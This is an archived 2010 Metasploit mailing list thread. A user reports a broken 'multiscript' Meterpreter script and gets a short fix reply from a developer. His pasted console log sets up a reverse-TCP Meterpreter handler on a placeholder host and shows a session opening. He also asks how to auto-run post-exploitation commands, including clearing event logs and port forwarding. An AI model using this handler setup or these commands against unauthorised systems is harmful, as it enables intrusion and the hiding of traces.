Metasploit mailing list archives

Re: Multiscript problem(again)?


From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sat, 24 Apr 2010 09:27:20 -0400

Thanks for reporting the problem, it should be fixed now, please svn up and test. 


Thanks,
Carlos
On Apr 24, 2010, at 2:19 AM, Sherif Eldeeb wrote:

Multiscript is not working for me:


      =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 542 exploits - 257 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
      =[ svn r9118 updated today (2010.04.23)

resource (/root/.msf3/msfconsole.rc)> use multi/handler
resource (/root/.msf3/msfconsole.rc)> set PAYLOAD
windows/meterpreter/reverse_tcp_dns
PAYLOAD => windows/meterpreter/reverse_tcp_dns
resource (/root/.msf3/msfconsole.rc)> set LHOST foo.bar.com
LHOST => foo.bar.com
resource (/root/.msf3/msfconsole.rc)> set LPORT 443
LPORT => 443
resource (/root/.msf3/msfconsole.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/.msf3/msfconsole.rc)> exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) >
[-] Handler failed to bind to 78.50.78.146:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

msf exploit(handler) >
[*] Sending stage (748032 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.9:443 -> 192.168.1.1:43392)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run multiscript -c "winenum;checkvm"
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running script winenum
[-] Error: NoMethodError undefined method `each_with_index' for "":String
[-] Error in script: winenum

[*]     running script checkvm
[-] Error: NoMethodError undefined method `each_with_index' for "":String
[-] Error in script: checkvm

meterpreter > run multiscript -c "winenum"
[*] Running Multiscript script.....
[*] Running script List ...
[*]     running script winenum
[-] Error: NoMethodError undefined method `each_with_index' for "":String
[-] Error in script: winenum
meterpreter >

============================================================================

Also, is there a way to let metasploit run a series of "meterpreter"
commands upon session creation the same way AutoRunScript does? I mean
muticommand will execute windows commands "cmd /c dir" and multiscript will
execute scripts, what I want is commands like "upload, clearev,
portfwd...etc".
Thanks in advance.
Sherif.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: